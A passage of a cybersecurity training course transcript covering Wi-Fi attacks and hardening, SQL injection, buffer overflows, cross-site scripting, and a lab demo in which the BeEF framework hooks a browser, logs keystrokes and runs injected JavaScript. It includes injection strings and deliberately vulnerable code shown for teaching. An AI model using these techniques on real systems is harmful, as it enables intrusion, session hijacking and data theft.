plugged in to allow the attacker to make a WiFi connection to that network where otherwise that might not be
possible. And then they could capture the traffic on the WiFi network and by extension on the wired network.
So the solution here is to ensure there are no active jacks such as the one behind our fictitious plant in the
lobby that are left active unless they need to be left open.
Other things to think about, infected connected devices. If malware infections are on the network on a device
that legitimately should be on the network, it could compromise the network. The malware might even scan the
network looking for the use of SSL on a wireless router or web admin GUI and try to take advantage or exploit
that weakness. Network access over distances. Well, as we saw in our previous example, on a network that
doesn't have wireless access, if somehow a rogue access point can be plugged into a wired jack on that
network. It could allow access to that network, even outside of the perimeter of the building or of the property.
Using outdated access point and wireless router firmware is always a problem. When updates are available,
make sure they are applied. That means you have to know when they're available, so do a bit of research.
Inventory your wireless equipment, subscribe to mailing lists, so that you are made aware when updates are
available.
[Video description begins] Access Point abbreviates to AP. [Video description ends]
User's plugging in access points and routers. Now we saw that we could have a malicious user do that. And we
know what the scary part of that is. We also want to make sure users don't just bring wireless routers to work
for convenience. So they can connect to the WiFi in the lunchroom if WiFi isn't already supported by the
organization. This means detecting additional devices on the network that are normally not there. And
detecting that as a risk, so with an intrusion detection type of system to detect rogue devices on the network.
After completing this video, you will be able to describe common Wi-Fi attack techniques.
Objectives
[Video description begins] Topic title: Wi-Fi Attacks. The presenter is Dan Lachance. [Video description ends]
Now there are many different types of WiFi attacks. It could be as simple as capturing and analyzing WiFi
traffic. A malicious user might set up a fake WiFi hotspot. This can even be done on a smartphone these days
for tethering purposes to fool people into connecting to that WiFi hotspot. Therefore, all the traffic goes
through the malicious user device. And they can capture it all and analyze it. Now of course, if it's strongly
encrypted they might not be able to do very much with it. But otherwise, they may. There are also tools that let
you crack WEP, WPA, and WPA2 wireless encryption. Tools like Aircrack-ng or Reaver or Hashcat. These
are tools that allow us to learn about WiFi encryption protocols that are in use, in some cases, exploit
weaknesses in them.
There's also the possibility of attackers using spoofed MAC addresses. The MAC address is the 48-bit
hexadecimal address that's assigned to your network interface card, including a WiFi card. And so if you have
specified only certain MACs are allowed to connect to the WiFi network, that is easily spoofed once the
attacker knows of valid MAC addresses. There are also freely available tools where attackers can discover
non-broadcasting SSIDs. You can configure your wireless router or access point to not broadcast its presence.
However, it still has to be sending radio signals through the air to allow connectivity. And so that means there
are tools and they can still discover non-broadcasting wireless networks.
So countermeasures. First of all, limit signal range. Some wireless routers and access points will let you
specify the signal strength. Which in turn equates to how far away one can be to make a connection to the
wireless network. MAC address filtering to specify MAC addresses that, for example, are allowed to connect.
And we know that those can be spoofed, but it's still a good security measure in addition to other items.
Updating the firmware. Maybe disabling remote access from the public network. This is often for remote
management purposes. Remote management should only ever be allowed from inside the network, not outside.
Using only HTTPS with TLS version 1.2 or higher. Perhaps using IEEE 802.1x network access control or
NAC devices which require authentication prior to allowing network access. Even through an authentication
server that supports RADIUS or TACACS+.
You can use a generic SSID that doesn't equate to the actual model of the wireless router or access point you're
using. The last thing you want to do if you're setting up a WiFi network for a bank boardroom is call it, bank A
boardroom. We don't want to do that because it indicates to potential attackers what it really is. We can disable
SSID broadcast even though it still can be detected. That'll keep a lot of the honest people out. We should have
an inventory of which WiFi devices should be on the network. And their details such as firmware versions and
their configurations. We can enable isolation mode on a wireless network. What this does is it ensures that
each WiFi device has their own virtual network connection to the WiFi router. This would prevent an attacker
connected to the WiFi network from capturing network traffic and seeing everybody's WiFi traffic.
Kind of like you would in a wired network using a hub, as opposed to, let's say, an Ethernet switch. You
should disable unused switch ports. And that kind of leads back to our example of a malicious user plugging in
a rogue wireless access point behind a plant in the lobby, where there's a network jack that still works.
Changing default items like the username and the password. And then automating log monitoring and alerts.
Often you can configure enterprise class WiFi devices to forward log entries to a centralized reporting system,
where it can look for any indications of suspicious activity. And then alert administrators about that. And then
there is as always user training and awareness. So that users have a sense of not clicking on things like
unexpected e-mail messages with file attachments or links, which could compromise their device, which in
turn could compromise other devices on that network, whether it's a WiFi network or not.
[Video description begins] WPA3 Wi-Fi Devices. A screenshot of the wi-fi.org website is displayed. [Video
description ends]
Now one thing to consider nowadays is using WPA3 types of WiFi devices. Here I've gone to the wi-fi.org
website where we can filter for WPA3 certified hardware. And essentially, this addresses some of the security
problems that are known with WPA2. Now, bear in mind WPA2 is a standard that's been around since 2004.
There's been plenty of time for attackers to find out if there are any weaknesses in WPA2. And there are ways
to crack WPA2-encrypted WiFi networks.
6. Video: Wi-Fi Tools (it_cscysa20_03_enus_06)
[Video description begins] Topic title: Wi-Fi Tools. The presenter is Dan Lachance. [Video description ends]
[Video description begins] The following window is open: root@kali:~. The following prompt is displayed:
root@kali:~#. [Video description ends]
I'll start with iw dev. And I can see interface wlan0 is my wireless card in Linux.
[Video description begins] He executes the following command: iw dev. The output displays that the interface
is wlan0. The prompt does not change. [Video description ends]
So I'm going to run iwlist wlan0 scan and I'm going to pipe that to the line filtering grep command. I only want
to see SSIDs or names of wireless networks.
[Video description begins] He executes the following command: iwlist wlan0 scan | grep SSID. The output
displays a list of wireless networks. The prompt does not change. [Video description ends]
I can now see a list of wireless networks. The first one looks like a bunch of Xs and 0s because it's a hidden
WiFi network. But I'm going to use the wpa_passphrase command here in Linux. And I'm going to specify a
passphrase I want to use to connect to the linksys WiFi network seen listed up above. So I'll put in linksys
space and then the password for that network, which I know. And then what I'm going to do is use the output
redirection or greater than symbol to dump that into a file, which I'm going to call linksys.conf.
[Video description begins] He executes the following command: wpa_passphrase linksys urnotFam0us >
linksys.conf. No output displays and the prompt does not change. [Video description ends]
And now I'm just going to view the contents of that file using the cat command. And we can see the SSID, we
can see the pre-shared key or psk in its text form.
[Video description begins] He executes the following command: cat linksys.conf. The output displays the
contents of the linksys.conf file. The prompt does not change. [Video description ends]
And also in its other form, which will be used to make an authenticated connection to the WiFi network.
[Video description begins] He executes the following command: clear. No output displays and the prompt does
not change. [Video description ends]
So I'm going to use the wpa_supplicant command and I'm going to use a -D for driver. And I'm going to
specify here a driver name for wireless extension. So I'm going to specify w-e-x-t, no space between the
parameter and the value, -i for interface. And the interface that we saw initially was called wlan0, so I'll
specify that. Then I'll specify -c and linksys.conf for our config file, where we've got the name of the wireless
network and the pre-shared key.
[Video description begins] He executes the following command: wpa_supplicant -Dwext -iwlan0 -
clinksys.conf. No output displays and the prompt does not change. [Video description ends]
So now if I do iwconfig, we can see that I'm connected on wlan0 to the linksys WiFi network.
[Video description begins] He executes the following command: iwconfig. The output displays information of
the wireless extensions for eth0, wlan0, and lo. The prompt does not change. [Video description ends]
So the next thing I need is to get a valid IP configuration. So I'm going to run the dhclient command in Linux
or interface wlan0.
[Video description begins] He executes the following command: dhclient wlan0. No output displays and the
prompt does not change. [Video description ends]
And after I've done that, if I type ifconfig and look at the wlan0 network interface at the bottom, I can see I've
got a valid IP.
[Video description begins] He executes the following command: ifconfig. The output displays that the wlan0
interface has a valid IP . The prompt does not change. [Video description ends]
So if I try to ping something, say on the Internet, like google.com, I get a reply.
[Video description begins] He executes the following command: ping www.google.com. The output displays
the ping statistics for www.google.com. The prompt does not change. [Video description ends]
[Video description begins] Topic title: Wi-Fi Hardening. The presenter is Dan Lachance. [Video description
ends]
Part of hardening a WiFi environment is the settings that you apply to your wireless access points and wireless
routers. Here I've got a D-Link emulator for a wireless router. And there are number of things that we can do to
harden this configuration.
The first thing I'll take a look at here is that I'm under the SETUP area. I'm going to click WIRELESS
SETTINGS.
[Video description begins] He selects the WIRELESS SETTINGS option in the navigation pane and its
corresponding page opens in the content pane. The WIRELESS SETTINGS page includes two subsections:
WIRELESS NETWORK SETTINGS and WIRELESS SECURITY MODE. It also includes a button labeled
"Save Settings". The WIRELESS NETWORK SETTINGS subsection includes a text box labeled "Wireless
Network Name" and a checkbox labeled "Enable Hidden Wireless". The WIRELESS SECURITY MODE
subsection contains a drop-down list box labeled "Security Mode". [Video description ends]
And over on the right, I have a number of things I see I can change. Notice that the default Wireless Network
Name, the SSID, is set to dlink. Well, because this is a D-Link wireless router, that's a bad idea. So what I'm
going to do is set this as just some other name. Maybe I'll call it apollo, which doesn't really imply the
company name, the location geographically, the model, the make, or anything.
[Video description begins] He types the following text in the "Wireless Network Name" text box:
apollo. [Video description ends]
Down below, I can also Enable Hidden Wireless. In other words, hiding the broadcast of the SSID details.
[Video description begins] He selects the "Enable Hidden Wireless" checkbox. [Video description ends]
Now technically, we still have radio signals going through the air. It's just that the frame that displays the
wireless name for the network is being suppressed. So there are freely available tools that malicious users
might use for reconnaissance to still discover that there are hidden wireless networks. But still, this is a great
way to keep basic, wannabe hackers out, I guess you could say. Scrolling down, we can also see the
WIRELESS SECURITY MODE. Now depending on the model of the wireless router you have, and also how
updated its firmware is, will determine which options show up here. You should try to stay away from WEP,
wired equivalent privacy, and WPA. Most modern wireless routers will support WPA2, and in some cases,
even the newer WPA3.
[Video description begins] He selects the following option in the "Security Mode" drop-down list box: Enable
WPA2 Wireless Security (enhanced). A new subsection called "WPA2" appears. It includes a drop-down list
box labeled "Personal / Enterprise". [Video description ends]
When you choose WPA2, for example, you can determine if you want to use personal WPA2 where you
specify a passphrase and confirm it. Any connecting WiFi clients would have to know the passphrase. Or you
could choose Enterprise, where you're using a centralized authentication server, such as a RADIUS or
TACACS+ server. This means then that even if this wireless router were to be compromised, user accounts
would not be. Because they're not stored here, there's no pass phrase here necessarily. It's really just going to
authenticate users to the RADIUS server where they must have a valid account. So that's something we can do
but there are some other interesting things here as well. Now I would click Save Settings normally to save
those configuration changes. If I go to ADVANCED, the other thing we can take a look at here is the transmit
power.
[Video description begins] He selects the ADVANCED option in the first part and its corresponding page
opens in the content pane. The content pane is further divided into two sections: navigation pane and content
pane. The navigation pane includes options called "VIRTUAL SERVER", "ADVANCED NETWORK", and
"ADVANCED WIRELESS". The VIRTUAL SERVER option is selected and its corresponding page is open in
the content pane. [Video description ends]
Now to do this, let's take a look, let's say, at ADVANCED WIRELESS. The Transmit Power here is set to
100%.
[Video description begins] He selects the ADVANCED WIRELESS option in the navigation pane and its
corresponding page opens in the content pane. The ADVANCED WIRELESS page includes a subsection called
"ADVANCED WIRELESS SETTINGS". It includes a drop-down list box labeled "Transmit Power". [Video
description ends]
Now, if we know that we don't need that much power because it's emanating WiFi signals much too far
beyond, let's say, our buildings for walls, then we might reduce it to 50%. And naturally this would take some
testing. The idea with the Transmit Power is we don't want to send our WiFi signal too far away from our
physical location where people that don't have to be in the office, for example, would still be able to attempt to
connect. So that's something else that we might consider. If I go to the TOOLS menu at the top, then we can
take a look at the ADMIN section. And this is where you most certainly should change the administrator name
and password.
[Video description begins] He selects the TOOLS option in the first part and its corresponding page opens in
the content pane. The content pane is further divided into two sections: navigation pane and content pane. The
navigation pane includes options called "ADMIN", "FIRMWARE", and "TIME". The ADMIN option is
selected and its corresponding page is open in the content pane. It includes two subsections called
"ADMINISTRATOR" and "USER". [Video description ends]
It says the default name is ADMIN. Got a default user account called USER. We want to change all of these
default settings because those default settings are easily attainable by anyone on the Internet that cares to look
it up. And so we don't want that made available. Now they would have to know the model of the wireless
router that we're using. That's why changing the SSID is not a bad idea. At least it changes the manufacturer
name. Some of the other things that we might be interested in doing, let's say, is going to under ADVANCED.
[Video description begins] He selects the ADVANCED option in the first part and its corresponding page
opens in the content pane. He selects the "ADVANCED NETWORK" option in the navigation pane and its
corresponding page opens in the content pane. It includes a subsection called "UPNP". This section contains
a check box labeled "Enable UPnP". [Video description ends]
And what I'm going to do is go under ADVANCED NETWORK. There's some things here you might want to
disable like Universal Plug and Play, UPnP. Which is enabled here by default, so I can just uncheck it. So
Universal Plug and Play allows any apps on your network to forward ports. And so if you've got a malware
infected device, then what that could do is request your router to allow port forwarding. And the problem with
this is it could expose computers on the inside of your network out to the Internet. So that's why I'm disabling
UPnP, Universal Plug and Play. So we have a number of options then here that we can reconfigure to harden
this item. The last thing here is just to take note of the Firmware Version listed here in the upper-right. Now it's
always important to apply the latest firmware updates to equipment such as wireless routers. And so if we go
to TOOLS, we could then go to FIRMWARE. Again, we can see the version number listed here, and the date.
[Video description begins] He selects the TOOLS option in the first part and its corresponding page opens in
the content pane. He selects the "FIRMWARE" option in the navigation pane and its corresponding page
opens in the content pane. It includes a subsection labeled "CURRENT FIRMWARE INFO". It includes the
following details: Current Firmware Version: 1.04 and Firmware Date: May 22, 2007. Under this text there is
a text box and a button labeled "Browse". [Video description ends]
And we could click the Browse button if we've downloaded the latest firmware update that we want applied to
this device.
After completing this video, you will be able to recognize how injection attacks can lead to the disclosure of
sensitive data.
Objectives
[Video description begins] Topic title: Injection Attacks. The presenter is Dan Lachance . [Video description
ends]
Injection attacks pose a threat against web applications. It's a general category of malicious activity that really
deals with malicious input provided by a malicious user in one way or another, that gets accepted and
processed by an application. So the key is to make sure the application doesn't process the injected malicious
content. Now this can result in the app behaving erratically. It could have caused it to crash or disclose
sensitive information. Or in some cases even allow privileged remote command execution. There are a couple
of different types of injection attacks,
[Video description begins] Common Injection Attack Types. [Video description ends]
such as a cross-site scripting or XSS attack, which itself has subcategories of its own types. Now, essentially
cross-site scripting means an attacker gets executable JavaScript code in a webpage that they somehow trick a
user into viewing. And so when the user views that webpage, the JavaScript code executes in their browser in
the end. And could disclose sensitive information like cookies or session information within the web browser.
There are host header injection types of attacks. A host header is possible when it comes to clients making
requests from a web app. Because you could have a single web server on one IP address hosting multiple web
apps. Well, then, how do we distinguish one from the other? The host header specifies the DNS domain name
of the app. But there have been known problems with this. Basically, it really depends on how the host header
passed to the web application is parsed and processed by the background code. And so in some cases that
could result in password resets being sent to any e-mail address domain specified in the host header. Where
that will allow an attacker to potentially reset a valid user's password, so the attacker would know it. There's
OS command injection. As the name implies, it allows the execution of operating system commands depending
on the back end OS hosting the web app. This is like a privilege escalation type of attack, and it can result from
a number of deficiencies on the web app. And then there are SQL injection attacks against databases. Let's take
a look at SQL injection attacks. So let's say that we've got a SQL database that a front-end web application is
communicating with. So we might have a form available on the front-end web app that allows users to specify
query information for the back-end database. So if the attacker enters something that always evaluates to true,
like 123, or 1 equal to 1, then that could be a problem. So a SQL statement, then, might be constructed based
on what's in the code and also what the user enters. So we might have, in the end, a statement put together that
looks like this. Select all columns, so asterisk, from a table called users, where the user ID equals and this is
where user input would kick in. So where the user ID equals 123, and there may or may not be a user ID with
that value, or 1 equal to 1. Well, 1 equal to 1 is always true. And if the application isn't properly checking that
input from the user. If it's not properly input validated, then it could return every row in this case in the users
table. As another example, let's look at some more vulnerable SQL injection attack code.
[Video description begins] A code snippet is displayed. The code reads, code starts: --VULNERABLE String
query equal "SELECT * FROM customers WHERE city equal to '"+ input+ "'"; Statement s equal
connection.createStatement(); ResultSet rs equal to statement.executeQuery(query); --NOT VULNERABLE
PreparedStatement s equal to connection.prepareStatement("SELECT * FROM customers WHERE city equal
to ?"); s.setString(1, input); ResultSet rs equal to statement.executeQuery();. Code ends. [Video description
ends]
So here we've got a string variable called query and it contains a SELECT statement. So I'll select all from
customers where city equals, and then we're asking for user input, we've got an input variable. Now, this can
be problematic because from this we could then create a statement, and then from there we could execute the
query. And then have the returned records in a result set variable, in this case called R set. Now, the problem
here is that what if the input variable does include something like a city name? Let's say Denver. But it also
includes a SQL command. So maybe the result of the input supplied by the user is Denver semicolon drop
table customers. Dropping a table means deleting it. That would be a problem if the code isn't properly
checking the input variable for those types of things. So as an example, doing the same type of thing, but
where it's not as vulnerable, could be to use a SQL prepared statement. Where what we're doing here is
running our SELECT statement, but we're specifying a question mark instead of just a variable, such as input.
And so the question mark is essentially just a parameter which can be filled in. Now the next thing we can do
is call upon the setString statement. Where the 1 is really just an integer value that denotes the parameter
number. And we could give it a name, for example, input, and then we could run our query that way. So the
difference here is that we are filtering what the user is entering. In other words, all they can specify here is a
city name, and that's it. So we are limiting city to being a parameter value. As opposed to allowing the user to
potentially enter something that becomes a part of the SQL command.
So what can be done about injection attacks? How can we mitigate or countermeasure those? One way's to use
the OWASP ESAPI. ESAPI stands for Enterprise Security API. OWASP is the Open Web Application
Security Project. This is free open source stuff to harden web apps from vulnerabilities like injections. So the
OWASP ESAPI is an open source free library that allows web app programmers to call upon so that they have
secure code. So it allows them to, essentially secure their code by making the calls to this library instead of
building everything themselves from scratch to validate input and so on. There's whitelisting input sources.
There is escaping special characters. These are all attack mitigations. Now escaping a special character means
taking away the meaning of a character that might have a special meaning. Such as to generate a query
statement, maybe as a wildcard. So if we take away those special meanings of those characters, we reduce the
potential for an injection attack. In this case to disclose sensitive information database. Another way to
mitigate injection attacks is to make sure the code is written securely. This means having a periodic code
review, ideally from other programmers from peers. Now that can be referred to as a static code analysis,
because the code's not yet been compiled. Using parameterized database queries. Now we saw that with SQL
prepared statements where we referenced the question mark symbol for the parameter value. That way, we can
eliminate any SQL commands from being a part of what's submitted by the user. Then there's secure coding
guidelines. A part of this would be using tools like all OWASP ESAPI, but it's also important that developers
have secure coding training.
After completing this video, you will be able to recall how overflow attacks work.
Objectives
[Video description begins] Topic title: Overflow Attacks. The presenter is Dan Lachance. [Video description
ends]
Overflow attacks have been an issue with web apps security and just regular application security for decades.
And it continues to be an issue. Generally speaking, when we say overflow attack, what we're talking about is
some kind of malicious input being fed into an app and the app accepts it and processes it. Now, that's pretty
generic. But we'll go through a couple of more specific examples. Now the result of the app processing that
malicious input, whatever it is, is that there's some kind of unanticipated app behavior. Whether the app
crashes, or discloses sensitive information, or allows the attacker to execute commands remotely with elevated
privileges. This is the same type of behavior you might expect with an injection attack. The difference is really
the nature of the vulnerability that gets exploited in the first place.
Common overflow attack types. Well, we start with an integer overflow. So an integer is a numeric value and
when we perform mathematical calculations as a part of application logic or application code. If the result of a
mathematical calculation exceeds the size of a variable that's maybe designed to accommodate a smaller value,
we have a problem. We could have an integer overflow issue. Now what that could mean is, well a number of
various behaviors. Because what can happen with integer values is that once we get to the upper limit, it resets
back to the lower limit. Depending on how the code processes that value determines exactly what the result is.
It could result in simply crashing the app. Then we've got standard buffer overflow attacks related to stacks
and to heaps.
Generally speaking, a buffer is an allocated chunk of memory. And attacks can either write beyond that
allocated memory space to cause problems or read from it to disclose sensitive information. And you might
recall that's what the heartbleed bug was about back in 2014 for web apps that used OpenSSL to secure the
connections ironically. Well what happened is that a request could be made to the web app through OpenSSL.
Whereby it might submit information that's actually only, let's say, 10 characters long. But then say, here's
something that's so many characters long, but really, it's a 1,000 characters. And so the server wouldn't check
it. It would return what was submitted, which might only be 10 characters long and then return a 1,000
characters.
And you do that enough times within a short period of time, you get a good sense of what's happening in
memory on that server. That was the heartbleed bug. But that is not a standard buffer overflow where we're
overwriting something. In this case, we are reading beyond a specific allocated buffer. Now when it comes to
stacks and heaps, we should be aware of what these are. First of all, let's start with a stack. When we talk about
a stack, we're talking about areas in memory, whereby in this case, the stack is used for user input variables for
an app. And the automation of the allocation and deallocation of memory for variables in the stack, allows it to
make memory available and then remove it when it's not needed.
However, when we talk about a heap, we're talking about the memory space used by an application where the
programmer has to manually allocate deallocate the memory. Either way, depending on how the code is
written and how it processes data supplied to buffers or data stored in buffers will determine what happens. So
when it comes to buffer overwriting, when we write beyond a certain allocated memory space, the app doesn't
expect other memory addresses to be written into. And that could cause some kind of a memory segmentation
fault and cause an app to crash, for example.
[Video description begins] Web Application Buffer Overflow Attack. A few lines of code are displayed, code
starts: void readstring() { char stringvar[3]; gets(stringvar); printf("%s", stringvar); return; }. Code
ends. [Video description ends]
Let's look at this example where we've got an app on a server and this is code written in the C programming
language. We've got a function here that doesn't return anything, so void, and it's called readstring. And the
first thing we're doing is establishing a variable called stringvar, three characters, because there is no string
data type in the C programming language. The best you can do is work with character arrays. Now the next
thing is the problem, we're using the gets or the get-S, get string function to read user input and store it in a
variable called stringvar. The problem is that the gets function just keeps on reading. It doesn't matter that
we've said that stringvar is three characters long, the function itself just keeps reading till it reads a newline
character. And so that's a problem. Because you might write your code assuming that only three characters
were ever input when, in fact, more might have been supplied.
Here, the printf statement is simply being used to return that item as a string, and then the function return
statement is executed. So instead of using gets, what really should have been done here is the developer should
have selected the fgets function. Because fgets can set a max limit on what is red unlike gets. Now, if this is the
code that's in place, then an attacker could supply more than three characters. And beyond the three characters
that are expected, that might be instructions that are to be executed server-side or could be just random data
that could cause the application to crash. Again, it really depends on the nature of the code and what it's doing
and where things are written to in memory.
So, what can we do about this? Well, the first order of business is to make sure that programmers adhere to
secure coding guidelines. One item of which is to make sure we have bounced checking. To make sure that if
we're asking for three characters, we only accept three characters. Or that If we are accepting input from a user,
and the user is giving us an instruction to say that here are 10 characters, and we're going to return it to the
user. We better make sure we only check that and return 10 characters and not a 1,000 characters, for example.
That references back to the heartbleed bug, the sensitive disclosure of information that shouldn't have been
disclosed.
As always, it's important to apply patches to the underlying operating system hosting an app to software
libraries and components used by an app. And developer tools used to work with the app. Also the use of
trusted code libraries. These days programmers don't write all of the code from scratch, they call upon existing
libraries. And some existing libraries are designed for secure coding. One example of that is the OWASP
ESAPI, the E-S-A-P-I, the enterprise security API. The other thing to consider is input validation in many
forms, including escaping special characters. As the term implies, a special character, such as a question mark
or a double quote or an asterisk or anything like that, has a special meaning in a certain environment. And so
we can take away those special meanings because that might be how an attacker issues remote commands by
escaping them. And in some languages for example, the escape character might be a backslash. So where a
question mark might normally have special meaning, if you put a backslash in front of it, you are taking away
the special meaning and literally treating it, in our example, as a question mark.
Upon completion of this video, you will be able to list different types of cross-site scripting attacks.
Objectives
[Video description begins] Cross-Site Scripting (XSS) Attacks. [Video description ends]
It's a type of injection attack. And this is true, because the malicious user is injecting often JavaScript code,
which ends up, in the end executing in client web browsers. So what happens then, to begin with, is that the
attacker injects malicious code through many different means. Through the URL, maybe through a web form
that isn't properly validated for user input or tricking a user to click a malicious ad that redirects them to some
other site. One way or another, the malicious code is made available. And somehow, we trick users into
viewing a page with that code on it, or clicking a link to get to that page. The malicious code then becomes
part of a web page that runs on the user's machines in their web browser. So the code ends up executing client
side for the most part. So when the victim loads the page, the code executes locally.
Now there are a number of different types of reasons why cross-site scripting attacks are implemented by
attackers. One is for a website defacement. Others is to hijack user session information like cookies which
could provide a wealth of information, especially if the user's currently signed into a banking app, for example,
on the web. Also, user redirection to alternate sites that might be under the control of the attacker to receive
sensitive information, like banking account details. There are three common types of cross-site scripting
attacks, the first being a DOM XSS attack. This stands for Document Object Model.
Essentially what can happen, is that attackers can put JavaScript code into a URL that then gets brought into an
HTML page, and then run by the client web browser. So a DOM XXS attack, a Document Object Model cross
site scripting attack, runs entirely on the client side. It's completely a client web browser type of attack. Now,
the user still has to somehow be tricked into loading that page. And that might even stem from the attacker
sending a phishing e-mail that looks legitimate, something to entice the user to click.
Next, we have a reflected cross-site scripting attack. Now, this is also called non-persistent because it's not
being stored on the server side. So what happens is that a web server that an attacker discovers that is
vulnerable has the ability to echo something back to a user. Such as the results of a search, or maybe an error
page when something is sent to that vulnerable web app that results in an error. So in other words, a malicious
script is reflected off of a vulnerable web app back to the victim's browser. So that would be a way that a user
might click a link in a phishing e-mail. And maybe that would run some kind of a search on a vulnerable web
app. And then you might get search results. But at the same time, what's reflecting back is some malicious
JavaScript code that was injected by the malicious user.
Next, we've got a stored cross-site scripting attack. This is called persistent because it's being stored on a web
server. So with the reflected XSS attack, the malicious JavaScript code is being injected as part of a URL. It's
not really being stored anywhere. However, with a stored persistent XSS attack, one way or another, an
attacker finds a way to inject JavaScript code, malicious code, let's say into a blog form. Maybe there's a form
where you can enter the body of your comments. And it doesn't have proper input validation checking. And so
the attacker can actually store, besides regular comments, actual JavaScript code. And so when anyone views
that blog entry on that web app, then they're also executing that JavaScript code. So you have the potential to
reach a larger victim audience so to speak from the attacker's perspective with a persistent cross-site scripting
attack.
And cookies are used to store website session information or user preferences, that type of data, it could be
anything really. So what would happen then is the victim would click the link. And in this particular example,
they would see the web page search result. So maybe the malicious user tricks the user into saying, hey, click
this link and there's some videos of you that were taken through Facebook video or something. The user will
click it and any of their current session cookies would be sent along to badsite.com, and the user wouldn't
know it. It's unknown that their cookies were sent there because it's just JavaScript that could be running in the
background. That doesn't have to be a user-side interface component to trigger them to know that it's actually
happening.
In this video, you will learn how to use the BeEF tool to exploit a web browser.
Objectives
[Video description begins] Topic title: Web Browser Compromise. The presenter is Dan Lachance. [Video
description ends]
We've all heard about the media reports about compromised hosts and credit card information and so on.
Oftentimes, the way that this actually occurs is simply by tricking unsuspecting victims into clicking on
something in an e-mail message or viewing a web page that has some kind of malicious script in it. In this
example, we're going to use Kali Linux to essentially take over a web browser, and we're going to do it
essentially by tricking that person to run a script. Now, in Kali Linux there's a tool called BeEF , B-E-E-F, and
it really stands for Browser Exploitation Framework. So to get started here, in Kali Linux, we're going to have
to load up the BeEF daemon, or server-side service, for this to work correctly.
[Video description begins] The following window is open: dlachance@kali:/. The following prompt is
displayed: dlachance@kali:/$. [Video description ends]
Then I'm going to use the sudo command to run the nano text editor that's built into Kali Linux, and I'm going
to edit a file in /etc/beef-xss, and the file's called config.yaml.
[Video description begins] He executes the following command: sudo nano /etc/beef-xss/config.yaml. The
/etc/beef-xss/config.yaml file opens. It includes the credentials to authenticate in BeEF. [Video description
ends]
One of the things that we can do here is specify the username and password that as a malicious user we would
use to authenticate to the BeEF web GUI tool, so the web interface. So once I've changed that, I can press
Ctrl+X for exit, and if it prompts me to save to the file, I would choose the letter Y and press Enter for yes.
[Video description begins] He exits the /etc/beef-xss/config.yaml file. [Video description ends]
Now that that's done, I'm going to use the sudo command again, because I want to run this as a privileged user.
And I'm going to run ./beef to start up the BeEF deamon. We can see it's actually loading right now, we just
have to wait a few seconds.
[Video description begins] He executes the following command: sudo ./beef. The output displays that the BeEF
server has started. [Video description ends]
And we can see here the IP address that it's running on, in this case 192.168.4.52.
[Video description begins] In the output, he points to the network interface: 192.168.4.52. [Video description
ends]
Notice we also have a UI URL. That's what we would connect to manage any hooked or compromised web
browsers. There's also a Hook URL. There's a little JavaScript file here that we can actually use this and embed
it within, for example, an HTML document within script tags.
[Video description begins] In the output, he points to the UI URL: http://192.168.4.52:3000/ui/panel. He then
points to the Hook URL: http://192.168.4.52:3000/hook.js. [Video description ends]
And this is what would actually execute in victim web browser computers that would compromise their system
and connect it to the BeEF server. Okay, let's take a look at how this actually works.
[Video description begins] He switches to the BeEF Authentication web page in a browser. [Video description
ends]
So in a web browser window, I've popped in that URL for the IP address of the BeEF server. It listens on port
3,000 by default. / ui, and then in this case /authentication. And I'm going to put in my BeEF credentials
according to whatever I've placed in the BeEF config yaml file. And after I've done that, it will authenticate me
into the UI.
[Video description begins] The BeEF Control Panel web page opens. The screen is divided into two parts, the
Hooked Browsers pane and the content pane. The Hooked Browsers pane includes two nodes: Online
Browsers and Offline Browsers. A page called "Getting Started" is open in the content pane. [Video
description ends]
Now here, I've got online and offline browsers. So offline browsers are ones that were previously hijacked or
connected to this interface.
[Video description begins] He expands the Offline Browsers node, and under it there is a 192.168.4.52
subnode. [Video description ends]
Now, on the Getting Started page, we've got a couple of demo pages here that we can use to hook a web
browser. So for example, I'm going to right-click on the first link for the demo page and copy that link. And
I've fired up a different web browser, in this case Google Chrome, and I've pasted in that link. And it says You
should be hooked into BeEF, Have fun while your browser is working against you. So we're simply testing
this. Let's flip back to the BeEF management GUI.
[Video description begins] He switches back to the BeEF Control Panel web page. [Video description ends]
Now, sure enough, under online browsers up here on the left, we can see the IP address of the browser, and it
appears to be Google Chrome. I can just hover over it and get some details. Looks like it's running Windows
10.
[Video description begins] The Online Browsers node expands, and it includes the 192.168.4.52 subnode,
which further includes the 192.168.4.24 subnode. [Video description ends]
If I click on it, I can also see a number of other details that are available. I can see the browser name.
[Video description begins] He clicks the 192.168.4.24 subnode and a page called "Current Browser" opens in
the content pane. It includes the following tabs: Details, Logs, Commands, and Proxy. The "Details" tab is
selected and it includes a table with two columns and several rows. The column headers are "Key" and
"Value". [Video description ends]
We can also see the platform. We can also see browser cookies. So here's a cookie related to hooking into the
BeEF GUI, this interface running on our server. And we could see a number of other details here, like the
window title for the web browser that we've compromised, and the URI and so on and so forth. So having done
that, we have a number of interesting things that we can do. For example, we can go to Logs, and we can see
what's been happening.
[Video description begins] He selects the "Logs" tab and it includes a table with 5 columns and several rows.
The column headers include "Type", "Event" and "Date". [Video description ends]
So for example, let's say I go back to this page, which is still active, and I'll type something in. I'm going to
type in happy birthday. Even though it's not being typed in anywhere, I'm typing it in.
[Video description begins] He switches to the BeEF Basic Demo web page. It includes a field labeled "Have a
go at the event logger. Insert your secret here:". [Video description ends]
So back here in the BeEF Control Panel under Logs, I'll just click the Refresh button at the bottom. And we
can see here, I've typed in happy birthday.
[Video description begins] He switches back to the BeEF Control Panel web page. [Video description ends]
We can actually see that that is what has been typed in to that browser. That in and of itself is extremely
alarming.
[Video description begins] He points to three row entries in the table on the Logs page. [Video description
ends]
There are plenty of things that are possible here, so let me just go to the Commands tab here for a moment.
And let's say we just go to, let's see, miscellaneous category, maybe Raw JavaScript.
[Video description begins] He selects the "Commands" tab. The page is divided into three sections: Module
Tree pane, Module Results History pane, and the content pane. The Module Tree pane includes the "Misc"
node. [Video description ends]
Here, we can send some JavaScript to the controlled browser. So here, it's just going to say BeEF Raw
JavaScript, and It worked.
[Video description begins] He expands the Misc node, which includes the Raw JavaScript subnode. He selects
the Raw JavaScript subnode and its corresponding page opens in the content pane. It includes a text box
labeled "Javascript code" and a button labeled "Execute". The "Javascript code" text box contains the
following text: alert('BeEF Raw Javascript'); return 'It worked!';. The Module Results History pane includes a
table with three columns and two rows. The column headers are id, date, and label. [Video description ends]
[Video description begins] He clicks the "Execute" button. A new row entry gets added to the table in the
Module Results History pane. [Video description ends]
And it says that the command was sent. And let's just go check it out in our browser. If I switch over to Google
Chrome, indeed, here it is.
[Video description begins] He clicks the third row entry in the table in the Module Results History pane and its
corresponding page opens in the content pane. He switches to the BeEF Basic Demo web page. A pop-up box
